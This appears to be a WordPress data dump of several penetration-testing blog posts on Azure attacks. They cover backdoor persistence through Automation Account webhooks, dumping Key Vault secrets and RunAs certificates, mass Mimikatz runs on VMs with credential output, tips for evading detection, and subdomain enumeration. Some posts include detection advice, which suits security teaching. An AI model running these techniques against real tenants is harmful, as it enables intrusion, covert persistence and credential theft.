Special thanks go out to one of our NetSPI security consultants, Jake Karnes, who was really helpful in testing out the Storage account contributor rights and patiently waited for the upload/download of the 5 GB IMG test files. [post_title] => Azure Privilege Escalation via Cloud Shell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-azure-cloud-shell [to_ping] => [pinged] => [post_modified] => 2022-01-20 09:58:00 [post_modified_gmt] => 2022-01-20 15:58:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11179 [menu_order] => 541 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [35] => WP_Post Object ( [ID] => 10747 [post_author] => 10 [post_date] => 2019-09-12 07:00:30 [post_date_gmt] => 2019-09-12 07:00:30 [post_content] => In every penetration test that involves Azure, we want to escalate our privileges up to a global administrator of the tenant. Once we've escalated our privileges in an Azure tenant, we want to have the ability to maintain our access to each subscription and the tenant as a whole. Aside from the benefits of controlling the Azure tenant, it can be really handy to have an Azure backdoor that could (potentially) be used to pivot back into the main AD environment. After escalating privileges in the Azure Tenant, we can make use of Automation Runbooks to persist in the Azure environment. There are multiple ways to persist in Azure, but for this post, we will focus on using Automation Accounts that are configured with excessive privileges, automation runbooks, and webhook triggers that will allow us to regain access to an Azure environment, with a single POST request.

TLDR

Want to maintain privileges in Azure? Add an Automation Account with excessive privileges that can be used to add new accounts (with Subscription Owner permissions) to AzureAD via a single POST request.

Potential Persistence Scenario

For the purposes of this blog, imagine this fairly standard Azure attack life cycle:
  1. Attacker compromises an Azure account/system
  2. Attacker escalates Azure privileges up to Global Administrator
  3. Blue team revokes initial access and/or Global Administrator access
In this type of scenario, we will want to have some type of persistence option available to re-enable our access into a tenant. Based off of my experience, Automation accounts typically fly under the radar. If they are set up properly, they can be use to regain Owner (or higher*) permissions to subscriptions in the Azure tenant with a new AzureAD account. Since newly created Azure accounts are more likely to get noticed, they should be used for short term access. While the Automation Accounts will act as the long haul persistence account. The Automation Accounts can also be configured for password access, or cert-based authentication, so those can also be an option for getting back into the subscription.

General Process:

  1. Create a new Automation Account
  2. Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
    1. Sample runbook for this Blog located here - https://github.com/NetSPI/MicroBurst
  3. Add the AzureAD module to the Automation account
    1. Update the Azure Automation Modules
  4. Assign "User Administrator" and "Subscription Owner" rights to the automation account
  5. Add a webhook to the runbook
  6. Eventually lose your access...
  7. Trigger the webhook with a post request to create the new user
*This runbook could be modified to be run as a global admin that creates a new global admin, but that's really noisy. Let me know if you do this. I'd be interested to see how well it works. I realize this is a bit of a legwork just to maintain persistence. The eventual goal is to automate this process with some PowerShell and integrate it with the existing MicroBurst tools.

Creating the Automation Account

Navigate to the "Automation Accounts" section of the Azure portal and create a new automation account. Naming it something basic, like BackupAutomationProcess, should avoid raising too many suspicions. Make sure that you set the "Create Azure Run As account" to yes, as this will be needed to run the backdoor runbook code. Autoaccount Add If you want to blend in with the default runbooks, the imported runbook name should follow the same naming strategy as the tutorials (AzureAutomationTutorial*). If you follow this naming convention, you will want to import and publish your malicious runbook into the account as soon as possible. The closer the timestamp is to your other tutorial runbooks, the less suspicious it will be. Can you tell which of these runbooks is the malicious one? Runbooks Once imported, you will also need to publish the runbook. This will then allow you to set a webhook for remote triggering of the runbook. To set the webhook, go to the Webhooks tab under the runbook. Webhook Depending on how long your operation is running, you may want to set your expiration date way off in the future to protect your ability to trigger the webhook. Important Step - Copy the webhook URL and keep it for when you need to trigger your backdoor.

Module Maintenance

Since the AzureAD module is not standard for Automation Accounts, you will need to import it into your account. Go to the Modules tab for the Automation account and use the "Browse Gallery" feature to find the "AzureAD" module.  Import it into your account, wait a few (5-10) minutes for it to deploy. The modules can sometimes take a while to populate to the Automation Accounts, so be patient. Azuread Additionally, your Automation Account may not play nicely with the current/old version of the AzureRM modules. I don't really know why this is still an issue for Azure, but you may need to update your Azure Automation Modules. This can be done with this runbook - https://aka.ms/UpdateModulesRunbookGitHub Since we're using a new Automation Account, the updates shouldn't cause any issues with existing runbooks. Alternatively, if you're using an existing Automation account for all of this, updating the modules could cause compatibility issues with existing runbooks. You would also need to assign the additional rights to the existing automation account, which is what we will cover next.

Setting Automation Account Rights

Once the automation account is configured and the webhook is set, the automation account will need the proper rights to add a new user, and give it owner rights on the subscription. To add these rights, navigate to the Azure Active Directory tab with a tenant admin account, and open the "Roles and Administrators" section. Within that section open the "User Administrator" role and add the automation account to the group. The Automation Account will be labeled with the name of the account, and a base64 string appended at the end. Autoaccount Given the fact that this username may stick out against the other users in the group, you may want to rename the Automation Account. This can be done in the AzureAD->App Registrations section, under "Branding". Renamed After adding user administrator rights, the automation account user will needed to be added as an owner on the subscription. This can be done through the subscriptions tab. Select the subscription that you want to persist in, and go to the Access Control (IAM) tab. Add the Owner role assignment to your Automation account, and you should be all set. This will also take a few minutes to populate, so give it a little while before you actually try to trigger the webhook.

Triggering the Webhook

Let's say that after escalating privileges and setting a persistence backdoor, the compromised tenant admin account gets flagged, and now you're locked out. Using the webhook URL from the earlier steps, and the example caller function below, you can now create a new subscription owner account (BlogDemoUser- Password123) for yourself in Azure.
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
This process may take a minute, as the runbook job will need to spool up, but after it has completed, you should have a newly minted subscription Owner account. Persist

Potential Concerns and Detection Techniques

While this process can be somewhat quiet in the right environment, it may be fairly obvious in the wrong one. A couple of things to keep in mind:
  • Creating a new AzureAD user could/should trigger an alert
  • Creating a new Automation Account could/should trigger an alert
  • Adding a user to the User Administrators and Owners groups could/should trigger an alert
Since the Automation Accounts section are not typically in an Azure user's portal dashboard, an attacker may be able to hide out for a while in the automation account. [post_title] => Maintaining Azure Persistence via Automation Accounts [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => maintaining-azure-persistence-via-automation-accounts [to_ping] => [pinged] => [post_modified] => 2022-03-11 10:27:24 [post_modified_gmt] => 2022-03-11 16:27:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=10747 [menu_order] => 548 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [36] => WP_Post Object ( [ID] => 10304 [post_author] => 10 [post_date] => 2019-03-20 07:00:23 [post_date_gmt] => 2019-03-20 07:00:23 [post_content] => This is the second post in a series of blogs that focuses around Azure Automation. Check out "Exporting Azure RunAs Certificates for Persistence" for more info on how authentication works for Automation Accounts. In this installment, we're going to focus on making use of Automation Accounts to gain access to sensitive data stored in Key Vaults. High Level TLDR:
  1. Gain access to an AzureAD account that has rights to create/modify/run automation runbooks in existing Automation Accounts
    1. This AzureAD account doesn't have access to any Key Vaults, but you want to read the vaults
  2. Access an Automation Account configured with rights to read keys from a Key Vault
  3. Add (or modify) a runbook for the Automation Account to access the Key Vault and dump the secrets
  4. Use your newfound secrets for further pivoting in the environment
I have been frequently running into situations where I have contributor access to a subscription, but I'm unable to access the data in the Azure Key Vaults. Since I can't grant myself access to the vaults (requires Owner rights), I've had to come up with some creative ways for accessing the Key Vaults with Contributor accounts.

Initial Access

Most of the time that we have access to a Contributor account in Azure, the account does not have access to any of the Key Vaults in the subscription. Security conscious developers/engineers will limit the rights for normal users and assign application specific accounts to handle accessing Key Vaults. This limits the liability put on user accounts, and keeps the secrets with the application service accounts. While we may not have access to the Key Vaults, we do have contributor rights on the Automation Account runbooks. This grants us the rights to create/modify/run automation runbooks for the existing Automation Accounts, which allows us to run code as automation users, that may have rights to access Key Vaults. Keyreaderoverlap So why does this happen? As a best practice for automating specific tasks within Azure, engineers may vault keys/credentials that are used by automation runbooks. The Automation Accounts are then granted access to the Key Vaults to make use of the keys/credentials as part of the automation process to help abstract the credentials away from the runbook code and the users. Common Automation Key Vault Applications:
  • Keys for encrypting data in an application
  • Local administrator passwords for VMs
  • SQL database credentials for accessing AzureSQL databases
  • Access key storage for other Azure services
As a side note: Azure developers/engineers are getting better at making use of Key Vaults for automation credentials, but we still occasionally see credentials that are hard-coded in runbooks. If you have read access on runbooks, keep an eye out for hard-coded credentials. Passwordinsource

Creating a New Runbook

In order to access the key vaults from the Automation Accounts, we will need to create a new runbook that will list out each of the vaults, and all of the keys for each vault. We will then run this runbook with the RunAs account, along with any credentials configured for the account. So far, this shotgun approach has been the easiest way to enumerate key values in a vault, but it's not the most opsec friendly method. In many of the environments that I've seen, there are specific alerting rules already set up for unauthorized access attempts to key vaults. So be careful when you're doing this. Newrunbook It has been a little difficult trying to come up with a method for determining Automation user access before running a runbook in the Automation Account. There's no way to grab cleartext automation credentials from an Automation Account without running a runbook, and it's a little tricky (but possible) to get the Key Vault rights for RunAs accounts before running a runbook. Grand scheme of things... you will need to run a runbook to pull the keys, so you might as well go for all the keys at once. If you want to be more careful with the Automation Accounts that you use for this attack, keep an eye out for runbooks that have code to specifically read from Key Vaults. Chances are good that the account has access to one or more vaults. You can also choose the specific automation accounts that you want to use in the following script.

Automating the Process

At a high level, here's what we will accomplish with the "Get-AzureKeyVaults-Automation" PowerShell function":
  1. List the Automation Accounts
    1. Select the Automation Accounts that you want to use
  2. Iterate through the list and run a standardized runbook in each selected account (with a randomized job name)
    1. List all of the Key Vaults
    2. Attempt to read every key with the current account
    3. Complete these actions with both the RunAs and Stored Credential accounts
  3. Output all of the keys that you can access
    1. There may be duplicate results at the end due to key access overlap
This PowerShell function is available under the MicroBurst repository. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst

Example

Here's a sample run of the function in my test domain:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize
Keyvaultdump Example Output: Keyvaultpasswords

Conclusions

For the Attackers - You may have a situation where you need to access Key Vaults with a lesser privileged user. Hopefully the code/function presented in this blog allows you to move laterally to read the secrets in the vault. For the Defenders - If you're using Automation Accounts in your subscription, there's a good chance that you will need to configure an Automation Account with Key Vault reader rights. When doing this, make sure that you're limiting the Key Vaults that the account has access to. Additionally, be careful with who you give subscription contributor access to. If a contributor is compromised, your Automation Accounts may just give up your secrets.

Update - 12/30/2019

This issue was not initially reported to MSRC, due to the fact that it's a user misconfiguration issue and not eligible for reporting per the MSRC guidelines ("Security misconfiguration of a service by a user"). However, they became aware of the blog and ended up issuing a CVE for it - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0962 [post_title] => Using Azure Automation Accounts to Access Key Vaults [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-automation-accounts-key-stores [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:04 [post_modified_gmt] => 2021-06-08 21:57:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=10304 [menu_order] => 555 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [37] => WP_Post Object ( [ID] => 10168 [post_author] => 10 [post_date] => 2019-02-27 07:00:53 [post_date_gmt] => 2019-02-27 07:00:53 [post_content] =>

This post will be the first blog in a series that focuses around Azure Automation. I've recently run into a fair number of clients making use of Azure Automation Runbooks, and in many cases, the runbooks are being misconfigured. As attackers, these misconfigurations can provide us credentials, sensitive data, and some interesting points for escalation.

Here's the high level TLDR overview of a standard usage of the scenario outlined in this blog:

  1. Gain access to an Azure AD account that has been provided runbook/Automation account permissions
  2. Create and run a runbook that gathers available RunAs certificate files
  3. Use the certificate files to maintain privileged access to an Azure environment
  4. Automate the whole process to simplify persistence options

Intro to Automation Accounts

Automation accounts are Azure's way of handling subscription process automation. Most implementations that I have been exposed to are set up to generate reports, copy over logs, or generally manage Azure resources. In general, the runbooks that I have seen are fairly basic and act as scheduled jobs to handle basic tasks. That being said, Automation runbooks can handle many different modules to allow you to administer multiple aspects of an Azure subscription.

Before we get too far, there's a couple of base terms to cover:

  • Automation Account
    • This is how Azure defines the high level organization unit for runbooks
    • Automation accounts are the container for runbooks
    • Subscription inherited (Owner/Contributor/Reader) IAM/Access control roles are applied at this level
  • Runbook
    • This is the specific code/script/workflow that you would run under an automation account
    • Typically PowerShell, Python, or a Workflow
    • These can also contain sensitive data, so looking over the code can be useful
  • Automation credential
    • These are the credentials used by the Runbook to accomplish tasks
    • Frequently set up as a privileged (contributor) account
    • There are two types of credentials
      • Traditional username/password
      • RunAs certificates

Both types of credentials (Passwords/RunAs) can typically be used to get access to subscriptions via the Azure PowerShell cmdlets.

Passwords versus Certificates

Automation Credentials are a cleartext username and password that you can call within a runbook for authentication. So if you're able to create a runbook, you can export these from the Automation account. If these are domain credentials, you should be able to use them to authenticate to the subscription.  I already covered the cleartext automation credentials in a previous post, so feel free to read up more about those there.

Az Cred

Surprisingly, I have found several instances where the automation credential account is set up with Global Administrator permissions for the Azure tenant, and that can lead to some interesting escalation opportunities.

Autocerts

The primary (and more common) option for running Runbooks is with a RunAs certificate. When creating a RunAs certificate, a RunAs account is registered as a Service Principal in Azure AD for the certificate/account. This "App" account is then added to the Contributors group for the domain. While some Azure admins may lock down the permissions for the account, we typically see these accounts as an opportunity to escalate privileges in an Azure environment.

If a "regular", lesser privileged user, has rights to create/run/modify Runbooks, they inherently have Contributor level rights for the subscription. While this is less likely, there is a chance that a user may have been granted contributor rights on an automation account. Check out this post by Microsoft for a full rundown of Automation Account Role Based Access Controls. At a high level, the subscription Owner and Contributor roles will have full access to Automation accounts.

Regardless of the privilege escalation element, we may also want to maintain access to an Azure environment after our initial account access is removed. We can do that by exporting RunAs certificates from the Automation account. These certificates can be used later to regain access to the Azure subscription.

Exporting Certificates

You will need to start by grabbing a copy of MicroBurst from the NetSPI Github.

The script (Get-AzurePasswords) was previously released, and already had the ability to dump the cleartext passwords for Automation accounts. If that is not an option for an Automation account that you're attacking, you now have the functionality to export a PFX file for authentication.

The script will run an Automation Runbook on the subscription that exports the PFX file and writes it out to a local file.  Once that is complete, you should have a ps1 file that you can use to automate the login for that RunAs account. I initially had this script pivoting the PFX files out through a Storage Account container, but found an easier way to just cast the files as Base64, and export them through the job output.

Example Command: Get-AzurePasswords -Keys N -AppServices N -Verbose

Dumpcertsdemo

Using the Authentication

The initial need for collecting automation certificates came from a recent assessment where I was able to pull down cleartext credentials for an automation account, but multi-factor authentication got in the way of actually using the credentials. In order to maintain contributor level access on the subscription, I needed to gather Automation certificates. If the initial access account was burned, I would still have multiple contributor accounts that I could fall back on to maintain access to the Azure subscription.

It's important to make a note about permissions here. Contributor access on the subscription inherently gives you contributor rights on all of the virtual machines.

As mentioned in a previous post, Contributor rights on Virtual Machines grants you SYSTEM on Windows and root on Linux VMs. This is really handy for persistence.

When running the AuthenticateAs scripts, make sure that you are running as a local Administrator. You will need the rights to import the PFX file.

It's not very flashy, but here is a GIF that shows what the authentication process looks like.

Authenticateas

One important note about the demo GIF:

I purposefully ran the Get-AzureRmADUser command to show that the RunAs account does not have access to read AzureAD. On the plus side, that RunAs account does have contributor rights on all of the virtual machines. So at a minimum, we can maintain access to the Azure VMs until the certificate is revoked or expires.

In most cases, you should be able to run the "AuthenticateAs" ps1 scripts as they were exported. If the automation RunAs Service Principal account (Example: USER123_V2h5IGFyZSB5b3UgcmVhZGluZyB0aGlzPw==) has been renamed (Example: User123), the "AuthenticateAs" ps1 script will most likely not work. If that is the case, you will need to grab the Application ID for the Automation account and add it to the script. You may have to search/filter a little to find it, but this ID can be found with the following AzureRM command:
Get-AzureRmADServicePrincipal | select DisplayName,ApplicationId

Az Runas

The script will prompt you if the account has been renamed, so keep an eye out for the warning text.

The AppIDs are also captured in the Domain_SPNs.csv (in the Resources folder) output from the Get-AzureDomainInfo function in MicroBurst.

Next Steps

Since I've been seeing a mix of standard Automation credentials and RunAs certificates lately, I wanted to have a way to export both to help maintain a persistent connection to Azure during an assessment. In the next two blogs, I'll cover how we can make use of the access to get more sensitive information from the subscription, and potentially escalate our privileges.

[post_title] => Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exporting-azure-runas-certificates [to_ping] => [pinged] => [post_modified] => 2022-03-11 10:27:23 [post_modified_gmt] => 2022-03-11 16:27:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=10168 [menu_order] => 557 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [38] => WP_Post Object ( [ID] => 9891 [post_author] => 10 [post_date] => 2018-11-06 07:00:23 [post_date_gmt] => 2018-11-06 07:00:23 [post_content] => Let's assume that you're on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have "Contributor" rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you're lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account. At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let's assume that we've exhausted the read-only options and we're still stuck with a somewhat privileged user that doesn't allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that's noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let's try for command execution on the VMs. In this example environment, let's assume that none of the VMs are publicly exposed and you don't want to open any firewall ports to allow for RDP or other remote management protocols. Even without remote management protocols, there's a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module). This handy command will allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT AuthoritySystem. That's right… VM command execution as System.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell, that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
Let's breakdown the parameters:
  • ResourceGroupName - The Resource Group for the VM
  • VMName - The name of the VM
  • CommandId - The stored type of command to run through Azure.
    • "RunPowerShellScript" allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath - This is the path to your PowerShell PS1 file that you want to run
You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:
PS C:> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test
In this example, we've added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it's been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in, ).
PS C:> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28) .## ^ ##.  
 ## /  ##  /* * *
 ##  / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0
This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I've added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst For our demo, we'll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.
Import-module MicroBurst.psm1</code> <code>Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds
Mimikatz Med The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 Minutes and 14 seconds. It's not ideal (see below), but it's functional. I haven't taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That's nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:
  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for Sensitive Files
  • Run domain information gathering scripts on one VM and use the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands. Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one take away from the post, let it be this - Contributor rights means SYSTEM rights on all the VMs. If you want to cut down your contributor's rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users. Additionally, if you want to detect this, keep an eye out for the "Run Command on Virtual Machine" log entries. It's easy to set up alerts for this, and unless the Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command. The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to All VMs in a subscription. Alertlogic As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page. [post_title] => Running PowerShell on Azure VMs at Scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-powershell-scripts-on-azure-vms [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:15 [post_modified_gmt] => 2021-06-08 21:56:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9891 [menu_order] => 568 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [39] => WP_Post Object ( [ID] => 9724 [post_author] => 10 [post_date] => 2018-10-02 07:00:50 [post_date_gmt] => 2018-10-02 07:00:50 [post_content] =>

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We've previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we're going to focus on finding existing Azure subdomains as part of the recon process. Also building off of another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure services subdomains.

So why do we want to do this? Let's say that we're doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there's a pretty good chance that there's a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.

Domains / Associated Services

Here's a list of Azure-related domains that I've identified:

DomainAssociated Service
azurewebsites.netApp Services
scm.azurewebsites.netApp Services - Management
p.azurewebsites.netApp Services
cloudapp.netApp Services
file.core.windows.netStorage Accounts-Files
blob.core.windows.netStorage Accounts-Blobs
queue.core.windows.netStorage Accounts-Queues
table.core.windows.netStorage Accounts-Tables
redis.cache.windows.netDatabases-Redis
documents.azure.comDatabases-Cosmos DB
database.windows.netDatabases-MSSQL
vault.azure.netKey Vaults
onmicrosoft.comMicrosoft Hosted Domain
mail.protection.outlook.comEmail
sharepoint.comSharePoint
azureedge.netCDN
search.windows.netSearch Appliance
azure-api.netAPI Services

Note: I tried to get all of the Azure subdomains into this script but there's a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to "test123", you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose

Enumsubdomains

If you’re having issues with the PowerShell execution policy, I still have it on good authority that there’s at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services - (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site, or a pre-production site that was not meant to be exposed to the internet. Here, you may have luck finding application security issues, or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don't think it's possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts - (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.

Email/SharePoint/Hosted Domain - (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with "onmicrosoft.com", there's a strong indication that they've at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it's unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.

Azuresqlfw

Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that's no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there's already a few people out there squatting on some existing subdomains (amazon.azurewebsites.net).

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you're keeping an eye out for the domains listed above while you're doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

